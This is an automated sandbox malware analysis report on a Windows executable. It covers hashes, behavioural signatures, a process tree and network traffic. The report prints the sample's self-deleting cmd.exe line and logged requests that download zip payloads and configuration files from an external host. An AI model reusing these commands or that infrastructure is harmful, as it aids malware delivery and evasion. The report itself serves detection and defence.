Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
153s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
04/10/2023, 10:50 UTC
Behavioral task
behavioral1
Sample
1987b42bfe0d36572cb59a43575b15fe8da5be747005d302898333232f90b47b.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
1987b42bfe0d36572cb59a43575b15fe8da5be747005d302898333232f90b47b.exe
Resource
win10v2004-20230915-en
General
-
Target
1987b42bfe0d36572cb59a43575b15fe8da5be747005d302898333232f90b47b.exe
-
Size
271KB
-
MD5
eb6c2b720bf1204827e513af9b93fc04
-
SHA1
da49da66e4d4ce6a9c656f821eaed25ad599f772
-
SHA256
1987b42bfe0d36572cb59a43575b15fe8da5be747005d302898333232f90b47b
-
SHA512
e8e1723052346d31abb701b87b8deedb002fe42bc899d99efd040f13ee6e4b2516ee6f193ae7bb130280bf18ac959a29073245024256d87562aaa14ef5b5d649
-
SSDEEP
6144:/l51orRJXlDixHkUXe34cEOkCybEaQRXr9HNdvOa:xqXUHkUXe3GOkx2LIa
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3212 created 608 3212 Explorer.EXE 5 -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\7lDdXAj.sys getmac.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Control Panel\International\Geo\Nation 1987b42bfe0d36572cb59a43575b15fe8da5be747005d302898333232f90b47b.exe -
Executes dropped EXE 2 IoCs
pid Process 2256 eda5f540 1836 getmac.exe -
resource yara_rule behavioral2/memory/1404-0-0x0000000000EF0000-0x0000000000F79000-memory.dmp upx behavioral2/files/0x00070000000231cd-2.dat upx behavioral2/files/0x00070000000231cd-4.dat upx behavioral2/memory/2256-3-0x0000000000080000-0x0000000000109000-memory.dmp upx behavioral2/memory/1404-9-0x0000000000EF0000-0x0000000000F79000-memory.dmp upx behavioral2/memory/2256-27-0x0000000000080000-0x0000000000109000-memory.dmp upx behavioral2/memory/1404-39-0x0000000000EF0000-0x0000000000F79000-memory.dmp upx behavioral2/memory/2256-64-0x0000000000080000-0x0000000000109000-memory.dmp upx behavioral2/memory/2256-69-0x0000000000080000-0x0000000000109000-memory.dmp upx -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 114.114.114.114 -
Drops file in System32 directory 26 IoCs
description ioc Process File created C:\Windows\SysWOW64\eda5f540 1987b42bfe0d36572cb59a43575b15fe8da5be747005d302898333232f90b47b.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE eda5f540 File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 eda5f540 File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B039FEA45CB4CC4BBACFC013C7C55604_50D7940D5D3FEDD8634D83074C7A46A3 getmac.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft eda5f540 File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_DD02D25E799024F48A93E8EE3BDDA41A eda5f540 File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DED9969D7ED2C6E555C5C9254A43EDE4 eda5f540 File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 eda5f540 File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies eda5f540 File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3FE2BD01AB6BC312BF0DADE7F797388F_896832C6BC857CFAEA9E59E166B13E2C getmac.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\0DA515F703BB9B49479E8697ADB0B955_4136D3715888E22D65EBE484B233D81B getmac.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B039FEA45CB4CC4BBACFC013C7C55604_50D7940D5D3FEDD8634D83074C7A46A3 getmac.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\349D186F1CB5682FA0194D4F3754EF36_CE21678B3713ACF5F5ED4AAA700C6173 getmac.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache eda5f540 File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E eda5f540 File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\AD5F118F7897046E8CA970AE6A6AB70B_ADB601E2C381343DA1163E5F08582475 getmac.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\0DA515F703BB9B49479E8697ADB0B955_4136D3715888E22D65EBE484B233D81B getmac.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData eda5f540 File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content eda5f540 File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_DD02D25E799024F48A93E8EE3BDDA41A eda5f540 File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DED9969D7ED2C6E555C5C9254A43EDE4 eda5f540 File created C:\Windows\system32\ \Windows\System32\I9C6biL.sys getmac.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3FE2BD01AB6BC312BF0DADE7F797388F_896832C6BC857CFAEA9E59E166B13E2C getmac.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\AD5F118F7897046E8CA970AE6A6AB70B_ADB601E2C381343DA1163E5F08582475 getmac.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\349D186F1CB5682FA0194D4F3754EF36_CE21678B3713ACF5F5ED4AAA700C6173 getmac.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E eda5f540 -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\getmac.exe Explorer.EXE File opened for modification C:\Program Files\getmac.exe Explorer.EXE -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\269fa0 eda5f540 File created C:\Windows\nbxZbS4I.sys getmac.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 getmac.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 getmac.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName getmac.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 3176 timeout.exe 8 timeout.exe -
Modifies data under HKEY_USERS 18 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix getmac.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" getmac.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" getmac.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" getmac.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing getmac.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" eda5f540 Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing eda5f540 Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" eda5f540 Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" getmac.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" getmac.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ eda5f540 Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" eda5f540 Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" eda5f540 Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ getmac.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix eda5f540 Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" eda5f540 Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" eda5f540 Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" getmac.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2256 eda5f540 2256 eda5f540 2256 eda5f540 2256 eda5f540 2256 eda5f540 2256 eda5f540 2256 eda5f540 2256 eda5f540 2256 eda5f540 2256 eda5f540 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 2256 eda5f540 2256 eda5f540 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe 1836 getmac.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3212 Explorer.EXE -
Suspicious behavior: LoadsDriver 3 IoCs
pid Process 668 Process not Found 668 Process not Found 668 Process not Found -
Suspicious use of AdjustPrivilegeToken 15 IoCs
description pid Process Token: SeDebugPrivilege 1404 1987b42bfe0d36572cb59a43575b15fe8da5be747005d302898333232f90b47b.exe Token: SeTcbPrivilege 1404 1987b42bfe0d36572cb59a43575b15fe8da5be747005d302898333232f90b47b.exe Token: SeDebugPrivilege 2256 eda5f540 Token: SeTcbPrivilege 2256 eda5f540 Token: SeDebugPrivilege 2256 eda5f540 Token: SeDebugPrivilege 3212 Explorer.EXE Token: SeDebugPrivilege 3212 Explorer.EXE Token: SeDebugPrivilege 2256 eda5f540 Token: SeIncBasePriorityPrivilege 1404 1987b42bfe0d36572cb59a43575b15fe8da5be747005d302898333232f90b47b.exe Token: SeDebugPrivilege 1836 getmac.exe Token: SeDebugPrivilege 1836 getmac.exe Token: SeDebugPrivilege 1836 getmac.exe Token: SeShutdownPrivilege 3212 Explorer.EXE Token: SeCreatePagefilePrivilege 3212 Explorer.EXE Token: SeIncBasePriorityPrivilege 2256 eda5f540 -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3212 Explorer.EXE -
Suspicious use of WriteProcessMemory 29 IoCs
description pid Process procid_target PID 2256 wrote to memory of 3212 2256 eda5f540 61 PID 2256 wrote to memory of 3212 2256 eda5f540 61 PID 2256 wrote to memory of 3212 2256 eda5f540 61 PID 2256 wrote to memory of 3212 2256 eda5f540 61 PID 2256 wrote to memory of 3212 2256 eda5f540 61 PID 3212 wrote to memory of 1836 3212 Explorer.EXE 91 PID 3212 wrote to memory of 1836 3212 Explorer.EXE 91 PID 3212 wrote to memory of 1836 3212 Explorer.EXE 91 PID 3212 wrote to memory of 1836 3212 Explorer.EXE 91 PID 3212 wrote to memory of 1836 3212 Explorer.EXE 91 PID 3212 wrote to memory of 1836 3212 Explorer.EXE 91 PID 3212 wrote to memory of 1836 3212 Explorer.EXE 91 PID 2256 wrote to memory of 608 2256 eda5f540 5 PID 2256 wrote to memory of 608 2256 eda5f540 5 PID 2256 wrote to memory of 608 2256 eda5f540 5 PID 2256 wrote to memory of 608 2256 eda5f540 5 PID 2256 wrote to memory of 608 2256 eda5f540 5 PID 1404 wrote to memory of 2572 1404 1987b42bfe0d36572cb59a43575b15fe8da5be747005d302898333232f90b47b.exe 96 PID 1404 wrote to memory of 2572 1404 1987b42bfe0d36572cb59a43575b15fe8da5be747005d302898333232f90b47b.exe 96 PID 1404 wrote to memory of 2572 1404 1987b42bfe0d36572cb59a43575b15fe8da5be747005d302898333232f90b47b.exe 96 PID 2572 wrote to memory of 3176 2572 cmd.exe 98 PID 2572 wrote to memory of 3176 2572 cmd.exe 98 PID 2572 wrote to memory of 3176 2572 cmd.exe 98 PID 2256 wrote to memory of 3192 2256 eda5f540 102 PID 2256 wrote to memory of 3192 2256 eda5f540 102 PID 2256 wrote to memory of 3192 2256 eda5f540 102 PID 3192 wrote to memory of 8 3192 cmd.exe 103 PID 3192 wrote to memory of 8 3192 cmd.exe 103 PID 3192 wrote to memory of 8 3192 cmd.exe 103
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:608
-
C:\Program Files\getmac.exe"C:\Program Files\getmac.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1836
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3212 -
C:\Users\Admin\AppData\Local\Temp\1987b42bfe0d36572cb59a43575b15fe8da5be747005d302898333232f90b47b.exe"C:\Users\Admin\AppData\Local\Temp\1987b42bfe0d36572cb59a43575b15fe8da5be747005d302898333232f90b47b.exe"2⤵
- Checks computer location settings
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 1 & del /Q /F "C:\Users\Admin\AppData\Local\Temp\1987b42bfe0d36572cb59a43575b15fe8da5be747005d302898333232f90b47b.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\SysWOW64\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:3176
-
-
-
-
C:\Windows\Syswow64\eda5f540C:\Windows\Syswow64\eda5f5401⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 1 & del /Q /F "C:\Windows\Syswow64\eda5f540"2⤵
- Suspicious use of WriteProcessMemory
PID:3192 -
C:\Windows\SysWOW64\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:8
-
-
Network
-
Remote address:8.8.8.8:53Request8.8.8.8.in-addr.arpaIN PTRResponse8.8.8.8.in-addr.arpaIN PTRdnsgoogle
-
Remote address:8.8.8.8:53Request4.159.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request241.154.82.20.in-addr.arpaIN PTRResponse
-
Remote address:114.114.114.114:53Requestdown.nugong.asiaIN AResponsedown.nugong.asiaIN CNAMEdown.nugong.asia.cdn.dnsv1.com.cndown.nugong.asia.cdn.dnsv1.com.cnIN CNAMEofgk41rd.slt.sched.tdnsv8.comofgk41rd.slt.sched.tdnsv8.comIN A116.163.24.195ofgk41rd.slt.sched.tdnsv8.comIN A123.12.213.243ofgk41rd.slt.sched.tdnsv8.comIN A119.188.86.194ofgk41rd.slt.sched.tdnsv8.comIN A1.62.64.68ofgk41rd.slt.sched.tdnsv8.comIN A122.189.171.55ofgk41rd.slt.sched.tdnsv8.comIN A221.15.67.105ofgk41rd.slt.sched.tdnsv8.comIN A42.7.60.104ofgk41rd.slt.sched.tdnsv8.comIN A110.249.196.101ofgk41rd.slt.sched.tdnsv8.comIN A36.248.54.85ofgk41rd.slt.sched.tdnsv8.comIN A119.167.229.212ofgk41rd.slt.sched.tdnsv8.comIN A116.172.148.7ofgk41rd.slt.sched.tdnsv8.comIN A125.39.165.235ofgk41rd.slt.sched.tdnsv8.comIN A218.29.205.139ofgk41rd.slt.sched.tdnsv8.comIN A123.12.213.187ofgk41rd.slt.sched.tdnsv8.comIN A123.12.235.196
-
Remote address:116.163.24.195:443RequestGET /pgm/mpr/c995ec7fd4f57c0d/0d78fe00f48f2148.zip HTTP/1.1
Accept-Encoding: gzip, deflate
Host: down.nugong.asia
ResponseHTTP/1.1 200 OK
Etag: "07cd7f7ac6965327899891eef3600839"
Content-Type: application/zip
Date: Fri, 29 Sep 2023 06:36:44 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 7570708988939014002
x-cos-request-id: NjUxNjcwN2JfZWYzNDY4MDlfZmZiMV8zMjA2MjFl
Content-Length: 463923
Accept-Ranges: bytes
X-NWS-LOG-UUID: 12384900960947331076
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
Remote address:8.8.8.8:53Request114.114.114.114.in-addr.arpaIN PTRResponse114.114.114.114.in-addr.arpaIN PTRpublic1114dnscom
-
Remote address:8.8.8.8:53Request208.194.73.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request254.20.238.8.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request195.24.163.116.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request41.110.16.96.in-addr.arpaIN PTRResponse41.110.16.96.in-addr.arpaIN PTRa96-16-110-41deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Requestg.bing.comIN AResponseg.bing.comIN CNAMEg-bing-com.a-0001.a-msedge.netg-bing-com.a-0001.a-msedge.netIN CNAMEdual-a-0001.a-msedge.netdual-a-0001.a-msedge.netIN A204.79.197.200dual-a-0001.a-msedge.netIN A13.107.21.200
-
GEThttps://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=77f88c83a1bd4b41b49d9e0ffb72e358&localId=w:31F834CF-BC45-37ED-F489-F6738C9E752F&deviceId=6755458044225800&anid=Remote address:204.79.197.200:443RequestGET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=77f88c83a1bd4b41b49d9e0ffb72e358&localId=w:31F834CF-BC45-37ED-F489-F6738C9E752F&deviceId=6755458044225800&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=07BFE75A6544636B2CA2F4FA640C62A8; domain=.bing.com; expires=Mon, 28-Oct-2024 10:50:51 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 50A86AF3DA0847F99BFCA6DE34A5E6E4 Ref B: BRU30EDGE0914 Ref C: 2023-10-04T10:50:51Z
date: Wed, 04 Oct 2023 10:50:50 GMT
-
GEThttps://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=77f88c83a1bd4b41b49d9e0ffb72e358&localId=w:31F834CF-BC45-37ED-F489-F6738C9E752F&deviceId=6755458044225800&anid=Remote address:204.79.197.200:443RequestGET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=77f88c83a1bd4b41b49d9e0ffb72e358&localId=w:31F834CF-BC45-37ED-F489-F6738C9E752F&deviceId=6755458044225800&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=07BFE75A6544636B2CA2F4FA640C62A8
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 013C11163CC54F218AAC12C8355BD2E0 Ref B: BRU30EDGE0914 Ref C: 2023-10-04T10:50:51Z
date: Wed, 04 Oct 2023 10:50:50 GMT
-
GEThttps://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=77f88c83a1bd4b41b49d9e0ffb72e358&localId=w:31F834CF-BC45-37ED-F489-F6738C9E752F&deviceId=6755458044225800&anid=Remote address:204.79.197.200:443RequestGET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=77f88c83a1bd4b41b49d9e0ffb72e358&localId=w:31F834CF-BC45-37ED-F489-F6738C9E752F&deviceId=6755458044225800&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=07BFE75A6544636B2CA2F4FA640C62A8
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 6F291559A6A84DDCAB71D3D8B53F91F6 Ref B: BRU30EDGE0914 Ref C: 2023-10-04T10:50:51Z
date: Wed, 04 Oct 2023 10:50:51 GMT
-
Remote address:8.8.8.8:53Request200.197.79.204.in-addr.arpaIN PTRResponse200.197.79.204.in-addr.arpaIN PTRa-0001a-msedgenet
-
Remote address:8.8.8.8:53Request26.35.223.20.in-addr.arpaIN PTRResponse
-
Remote address:116.163.24.195:80RequestGET /cfg/cmc/ping.txt HTTP/1.1
Host: down.nugong.asia
ResponseHTTP/1.1 200 OK
Etag: "bdf198e2733b39eae21f211114395f67"
Content-Type: text/plain
Date: Fri, 28 Jul 2023 03:05:56 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 3269775211629437622
x-cos-meta-md5: bdf198e2733b39eae21f211114395f67
x-cos-request-id: NjRjMzMwOTRfY2Y1MGJlMDlfNjIyMF8xNjVlNDZj
Content-Length: 16
Accept-Ranges: bytes
X-NWS-LOG-UUID: 11160378879197059676
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
Remote address:116.163.24.195:80RequestGET /cfg/cmc/ping.txt HTTP/1.1
Host: down.nugong.asia
ResponseHTTP/1.1 200 OK
Etag: "bdf198e2733b39eae21f211114395f67"
Content-Type: text/plain
Date: Fri, 28 Jul 2023 03:05:56 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 3269775211629437622
x-cos-meta-md5: bdf198e2733b39eae21f211114395f67
x-cos-request-id: NjRjMzMwOTRfY2Y1MGJlMDlfNjIyMF8xNjVlNDZj
Content-Length: 16
Accept-Ranges: bytes
X-NWS-LOG-UUID: 9106975594564456352
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
Remote address:116.163.24.195:80RequestGET /cfg/cmc/userchange.txt HTTP/1.1
Host: down.nugong.asia
ResponseHTTP/1.1 200 OK
Etag: "5001520cededdba4392d6d3c567a2306"
Content-Type: text/plain
Date: Fri, 28 Jul 2023 06:26:24 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 12026736056808147491
x-cos-meta-md5: 5001520cededdba4392d6d3c567a2306
x-cos-request-id: NjRjMzVmOTBfOGUzYzY4MDlfODQ3Y18xOTUwMzk1
Content-Length: 80
Accept-Ranges: bytes
X-NWS-LOG-UUID: 7098320501899191445
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
Remote address:116.163.24.195:80RequestGET /cfg/cmc/userpq.zip HTTP/1.1
Host: down.nugong.asia
ResponseHTTP/1.1 200 OK
Etag: "fad231aeeb4c2eac2ff215a8172da6e7"
Content-Type: application/zip
Date: Mon, 02 Oct 2023 08:01:38 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 17983149572618678898
x-cos-request-id: NjUxYTc4ZTJfZGFlZjk4MWVfMzA0ZF8yZDIyNTYw
Content-Length: 13408
Accept-Ranges: bytes
X-NWS-LOG-UUID: 6547221676952680527
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
Remote address:116.163.24.195:80RequestGET /cfg/cmc/blacklist.txt HTTP/1.1
Host: down.nugong.asia
ResponseHTTP/1.1 200 OK
Etag: "81074a24b7f65c6446b4f014291bbbcb"
Content-Type: text/plain
Date: Thu, 28 Sep 2023 07:57:21 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 11643962358373933104
x-cos-request-id: NjUxNTMxZTBfNTBkNzdkMDlfMWI4NDFfMjY1MGRhYw==
Content-Length: 12016
Accept-Ranges: bytes
X-NWS-LOG-UUID: 13668875218857656321
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
Remote address:116.163.24.195:80RequestGET /cfg/user/c995ec7fd4f57c0d/0d78fe00f48f2148.json HTTP/1.1
Host: down.nugong.asia
ResponseHTTP/1.1 200 OK
Etag: "1eba8e243164ae3e2c9243d802c5fd79"
Content-Type: application/json
Date: Tue, 22 Aug 2023 06:37:06 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 3320060066327462193
x-cos-request-id: NjRlNDU3OTJfNzRlZDk4MWVfYTI2Yl8zZGMxODk2
Content-Length: 7248
Accept-Ranges: bytes
X-NWS-LOG-UUID: 1285885473667175676
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
Remote address:116.163.24.195:80RequestGET /cfg/pub/ms.json HTTP/1.1
Host: down.nugong.asia
ResponseHTTP/1.1 200 OK
Etag: "10040ea185914984ce16a2e607ba5ffc"
Content-Type: application/json
Date: Wed, 04 Oct 2023 09:25:22 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 1369726845627411732
x-cos-request-id: NjUxZDJmODJfNjhlZTk4MWVfYjBkNF8zMDg2YzBi
Content-Length: 70816
Accept-Ranges: bytes
